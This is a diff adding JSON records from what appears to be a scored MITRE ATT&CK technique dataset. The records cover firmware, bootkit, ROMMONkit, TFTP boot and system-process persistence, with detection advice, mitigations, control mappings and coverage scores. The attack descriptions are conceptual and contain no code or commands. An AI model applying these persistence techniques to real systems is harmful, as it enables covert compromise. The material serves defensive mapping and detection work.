+                "detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)",
+                "mitigations": [
+                    {
+                        "mid": "M1046",
+                        "name": "Boot Integrity",
+                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                        "url": "https://attack.mitre.org/mitigations/M1046"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
+                    }
+                ]
+            },
+            {
+                "tid": "T1542.002",
+                "name": "Pre-OS Boot: Component Firmware",
+                "url": "https://attack.mitre.org/techniques/T1542/002",
+                "description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\n\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.",
+                "detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1542.003",
+                "name": "Pre-OS Boot: Bootkit",
+                "url": "https://attack.mitre.org/techniques/T1542/003",
+                "description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.",
+                "detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.",
+                "mitigations": [
+                    {
+                        "mid": "M1046",
+                        "name": "Boot Integrity",
+                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                        "url": "https://attack.mitre.org/mitigations/M1046"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1542.004",
+                "name": "Pre-OS Boot: ROMMONkit",
+                "url": "https://attack.mitre.org/techniques/T1542/004",
+                "description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)\n\n\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.",
+                "detection": "There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1046",
+                        "name": "Boot Integrity",
+                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                        "url": "https://attack.mitre.org/mitigations/M1046"
+                    },
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    }
+                ]
+            },
+            {
+                "tid": "T1542.005",
+                "name": "Pre-OS Boot: TFTP Boot",
+                "url": "https://attack.mitre.org/techniques/T1542/005",
+                "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\n\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)",
+                "detection": "Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nReview command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1046",
+                        "name": "Boot Integrity",
+                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                        "url": "https://attack.mitre.org/mitigations/M1046"
+                    },
+                    {
+                        "mid": "M1035",
+                        "name": "Limit Access to Resource Over Network",
+                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1035"
+                    },
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    },
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1046",
+                "name": "Boot Integrity",
+                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                "url": "https://attack.mitre.org/mitigations/M1046"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.41972452904761903,
+        "adjusted_score": 0.41972452904761903,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.6",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-8",
+            "IA-2",
+            "IA-7",
+            "IA-8",
+            "RA-9",
+            "SA-10",
+            "SA-11",
+            "SC-34",
+            "SC-7",
+            "SI-2",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true,
+        "actionability_score": {
+            "combined_score": 0.319047619047619,
+            "mitigation_score": 0.6,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00067691
+    },
+    {
+        "tid": "T1542.001",
+        "name": "Pre-OS Boot: System Firmware",
+        "description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.",
+        "url": "https://attack.mitre.org/techniques/T1542/001",
+        "tactics": [
+            "Defense Evasion",
+            "Persistence"
+        ],
+        "detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Firmware: Firmware Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1542",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1046",
+                "name": "Boot Integrity",
+                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                "url": "https://attack.mitre.org/mitigations/M1046"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.40476190476190477,
+        "adjusted_score": 0.40476190476190477,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-8",
+            "IA-2",
+            "IA-7",
+            "IA-8",
+            "RA-9",
+            "SA-10",
+            "SA-11",
+            "SC-34",
+            "SI-2",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1542.002",
+        "name": "Pre-OS Boot: Component Firmware",
+        "description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\n\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.",
+        "url": "https://attack.mitre.org/techniques/T1542/002",
+        "tactics": [
+            "Defense Evasion",
+            "Persistence"
+        ],
+        "detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Driver: Driver Metadata",
+            "Firmware: Firmware Modification",
+            "Process: OS API Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1542",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1542.003",
+        "name": "Pre-OS Boot: Bootkit",
+        "description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.",
+        "url": "https://attack.mitre.org/techniques/T1542/003",
+        "tactics": [
+            "Defense Evasion",
+            "Persistence"
+        ],
+        "detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.",
+        "platforms": [
+            "Linux",
+            "Windows"
+        ],
+        "data_sources": [
+            "Drive: Drive Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1542",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1046",
+                "name": "Boot Integrity",
+                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                "url": "https://attack.mitre.org/mitigations/M1046"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.35238095238095235,
+        "adjusted_score": 0.35238095238095235,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.6",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-8",
+            "IA-2",
+            "IA-7",
+            "IA-8",
+            "RA-9",
+            "SA-10",
+            "SA-11",
+            "SC-34",
+            "SI-2",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1542.004",
+        "name": "Pre-OS Boot: ROMMONkit",
+        "description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)\n\n\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.",
+        "url": "https://attack.mitre.org/techniques/T1542/004",
+        "tactics": [
+            "Defense Evasion",
+            "Persistence"
+        ],
+        "detection": "There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.",
+        "platforms": [
+            "Network"
+        ],
+        "data_sources": [
+            "Firmware: Firmware Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1542",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1046",
+                "name": "Boot Integrity",
+                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                "url": "https://attack.mitre.org/mitigations/M1046"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.3380952380952381,
+        "adjusted_score": 0.3380952380952381,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "13.3",
+            "13.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-7",
+            "RA-5",
+            "RA-9",
+            "SA-10",
+            "SA-11",
+            "SC-34",
+            "SC-7",
+            "SI-2",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1542.005",
+        "name": "Pre-OS Boot: TFTP Boot",
+        "description": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.\n\nAdversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)",
+        "url": "https://attack.mitre.org/techniques/T1542/005",
+        "tactics": [
+            "Defense Evasion",
+            "Persistence"
+        ],
+        "detection": "Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)\n\nReview command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.",
+        "platforms": [
+            "Network"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Firmware: Firmware Modification",
+            "Network Traffic: Network Connection Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1542",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1046",
+                "name": "Boot Integrity",
+                "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                "url": "https://attack.mitre.org/mitigations/M1046"
+            },
+            {
+                "mid": "M1035",
+                "name": "Limit Access to Resource Over Network",
+                "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1035"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.5047619047619047,
+        "adjusted_score": 0.5047619047619047,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.2",
+            "4.7",
+            "4.8",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "8.1",
+            "8.2",
+            "8.3",
+            "12.2",
+            "12.5",
+            "13.3",
+            "13.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-7",
+            "IA-8",
+            "RA-5",
+            "RA-9",
+            "SA-10",
+            "SA-11",
+            "SC-34",
+            "SC-7",
+            "SI-2",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1543",
+        "name": "Create or Modify System Process",
+        "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. (Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.  \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges. (Citation: OSX Malware Detection).  ",
+        "url": "https://attack.mitre.org/techniques/T1543",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.  \n\nCommand-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. \n\nMonitor for changes to files associated with system-level processes.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Service: Service Creation",
+            "Service: Service Modification",
+            "Windows Registry: Windows Registry Key Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1543.001",
+                "name": "Create or Modify System Process: Launch Agent",
+                "url": "https://attack.mitre.org/techniques/T1543/001",
+                "description": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.\n\n Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.\n \nAdversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) ",
+                "detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.\n\nEnsure Launch Agent's  ProgramArguments  key pointing to executables located in the /tmp or /shared folders are in alignment with enterprise policy. Ensure all Launch Agents with the RunAtLoad key set to true are in alignment with policy. ",
+                "mitigations": []
+            },
+            {
+                "tid": "T1543.002",
+                "name": "Create or Modify System Process: Systemd Service",
+                "url": "https://attack.mitre.org/techniques/T1543/002",
+                "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands:\n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)",
